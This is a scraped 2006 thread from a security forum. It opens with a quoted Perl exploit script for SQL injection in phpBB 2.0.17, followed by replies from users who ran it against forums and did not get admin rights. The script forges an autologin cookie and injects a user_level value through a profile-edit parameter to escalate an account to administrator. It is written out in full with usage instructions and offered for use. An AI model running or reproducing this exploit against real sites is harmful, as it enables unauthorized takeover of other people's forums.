 |
Menu |
 |
|
 Home |
| |
|
 Discussions |
| |
|
 Tools |
| |
|
| Affiliates |
| |
|
 Content |
| |
|
 Info |
| | |
|
|
|
|
|
User Info |
|
 Membership:
 Latest: MichaelSnaRe
 New Today: 0
 New Yesterday: 0
 Overall: 9144
 People Online:
 Visitors: 458
 Members: 0
 Total: 458
|
|
|
|
|
|
Full disclosure |
|
CyberDanube Security Research 20251014-0 | Multiple Vulnerabilities in Phoenix Contact QUINT4 UPS
apis.google.com - Insecure redirect via __lu parameter(exploited in the wild)
Urgent Security Vulnerabilities Discovered in Mercku Routers Model M6a
Re: Security Advisory: Multiple High-Severity Vulnerabilities in Suno.com (JWT Leakage, IDOR, DoS)
Security Advisory: Multiple High-Severity Vulnerabilities in Suno.com (JWT Leakage, IDOR, DoS)
[SBA-ADV-20250730-01] CVE-2025-39664: Checkmk Path Traversal
[SBA-ADV-20250724-01] CVE-2025-32919: Checkmk Agent Privilege Escalation via Insecure Temporary Files
CVE-2025-59397 - Open Web Analytics SQL Injection
Re: [FD]Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Re: Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Re: Defense in depth -- the Microsoft way (part 93): SRP/SAFERwhitelisting goes black on Windows 11
Re: [FD]: "Glass Cage" – Zero-Click iMessage ? Persistent iOS Compromise + Bricking (CVE-2025-24085 / 24201, CNVD-2025-07885)
Re: [FD]Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Samtools v1.22.1 Uncontrolled Memory Allocation from Large BED Intervals Causes Denial-of-Service in Samtools/HTSlib
Samtools v1.22.1 Improper Handling of Excessive Histogram Bin Counts in Samtools Coverage Leads to Stack Overflow
|
|
|
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
|
SQL injection - phpBB 2.0.17 exploit |
|
 Posted: Thu Mar 09, 2006 9:44 pm |
 |
|
| lookatmenow |
| Regular user |
 |
|
| Joined: Feb 24, 2006 |
| Posts: 21 |
|
|
|
 |
|
 |
|
| Quote: |
#!/usr/bin/perl
# Exploit for sql injection in phpbb <=2.0.17
# It works with php5, with register_globals on and magic_quotes_gpc off
# Author: Eax (eax@cc-team.org)
use strict;
use LWP::UserAgent;
use Digest::MD5 'md5_hex';
if (@ARGV<6){
print "Usage $0 host path your_id your_password your_email your_username\n";
print "example: $0 target.org /phpbb/ 10 blebleble ble\@ble.pl ble\n\n";
exit;
}
my $host = $ARGV[0];
my $path = $ARGV[1];
my $userid = $ARGV[2];
my $passwd = $ARGV[3];
my $mail = $ARGV[4];
my $username = $ARGV[5];
$passwd = md5_hex($passwd);
my $cookie_string = "phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A%2
2".$passwd."%22%3Bs%3A6%3A%22userid%22%3Bi%3A".$userid."%3B%7D";
my $browser = LWP::UserAgent->new ();
$browser->default_header(Cookie=>$cookie_string);
my $address = 'http://'.$host.$path.'profile.php';
my $response = $browser->post($address, [ "username" => $username, "email" => $mail,
"mode"=>'editprofile', "agreed"=>'true', "coppa"=>'0', "user_id"=>$userid, "
current_email"=>$mail, "submit"=>"Submit", 'GLOBALS[signature_bbcode_uid]'=>"', u
ser_level='1"]);
print "if everything was ok you should have admin rights now  \n";
|
I've run this, and it seems to be successful because it always says:
''If everything was ok you should have admin rights now''.
However, I still don't. Is there something I missed...or does it just mean the forum is not vulnerable? |
|
|
|
|
|
|
|
|
| Posted: Fri Mar 10, 2006 9:07 am |
|
|
| fizzi |
| Advanced user |
|
|
| Joined: Sep 14, 2005 |
| Posts: 55 |
|
|
|
|
|
|
|
| As i can see, you have to be registered to that forum and put your data as arguments to that exploits. After that you should be admin at the forum. |
|
|
|
|
| Posted: Fri Mar 10, 2006 9:07 am |
|
|
| fizzi |
| Advanced user |
|
|
| Joined: Sep 14, 2005 |
| Posts: 55 |
|
|
|
|
|
|
|
| As i can see, you have to be registered to that forum and put your data as arguments to that exploits. After that you should be admin at the forum. |
|
|
|
|
| Posted: Fri Mar 10, 2006 10:15 am |
|
|
| lookatmenow |
| Regular user |
|
|
| Joined: Feb 24, 2006 |
| Posts: 21 |
|
|
|
|
|
|
|
Yeah i've registered etc, put my password email username etc.
like i said it told me 'everything went o.k, you should have admin' and i thought, well that worked nice. then i went on to the forum and i didn't. tried the script whilst i was logged in on the forum aswell, didn't work. so i tried just typing in /admin/index.php and it said i was unauthorized.
which is why i thought maybe that forum wasn't vulnerable perhaps. then again why would the script say it was...but then it not to work. hmmmm tis a thinker. |
|
|
|
|
| Posted: Sat May 20, 2006 12:15 am |
|
|
| sljyro |
| Advanced user |
 |
|
| Joined: Mar 23, 2006 |
| Posts: 53 |
|
|
|
|
|
|
|
can anyone give a slight insight on this one too? i keep getting the same problem as the above user.
thanks |
|
|
|
|
| Posted: Sat May 20, 2006 9:09 am |
|
|
| smile |
| Regular user |
|
|
| Joined: May 19, 2006 |
| Posts: 5 |
|
|
|
|
|
|
|
if you get troubles with the script try it as it's demonstrated here. Much more obvious what happens and if it works or not.
http://undergr0und.net/forum/showthread.php?t=624
greetz, smile
BTW: IMHO this script has nothing to do with real SQL injection |
|
|
|
|
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
